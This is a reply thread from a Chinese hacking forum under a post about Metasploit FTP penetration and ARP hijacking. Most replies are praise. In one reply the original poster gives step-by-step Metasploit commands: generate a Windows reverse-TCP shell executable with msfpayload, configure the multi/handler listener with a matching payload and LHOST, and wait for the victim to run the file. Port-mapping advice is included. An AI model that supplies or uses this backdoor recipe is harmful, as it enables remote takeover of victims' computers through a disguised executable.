楼主: milkeway

msf ftp渗透+ARP劫持 内容很叼

[复制链接]
发表于 2014-10-28 19:18:42 | 显示全部楼层
一直都想认识大牛!

点评

Q1225780196  详情 回复 发表于 2014-10-30 13:05
回复 支持 反对

使用道具 举报

发表于 2014-10-29 00:00:08 | 显示全部楼层
又是内网么?小伙伴?内网渗透不少了吧- -
回复 支持 反对

使用道具 举报

发表于 2014-10-29 15:16:39 | 显示全部楼层
好强大
回复 支持 反对

使用道具 举报

发表于 2014-10-29 23:27:19 | 显示全部楼层
学习 谢谢楼主分享
回复 支持 反对

使用道具 举报

 楼主| 发表于 2014-10-30 12:44:25 | 显示全部楼层
本帖最后由 milkeway 于 2014-10-30 12:50 编辑
lingfeng 发表于 2014-10-27 09:32
求解大牛payload怎么弹回来。


用payload 生成一个后门  如果是路由映射一下。。生成后 进入反弹的那个插件下。。。

像这样。msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 X >/root/a.exe               然后use exploits/multi/handler  然后use exploits/multi/handler 然后
set PAYLOAD windows/shell/reverse_tcp 这里payload 要设置成跟前边的一样,参数也要一样set LHOST 127.0.0.1 (你的IP)然后exploit 等待用户执行a.exe
回复 支持 反对

使用道具 举报

 楼主| 发表于 2014-10-30 13:05:30 | 显示全部楼层
qianxi 发表于 2014-10-28 19:18
一直都想认识大牛!

Q1225780196
回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2014-10-31 20:19:04 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2014-11-13 12:04:28 | 显示全部楼层
恩,挺吊!!!
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-2 17:38 , Processed in 0.062643 second(s), 17 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部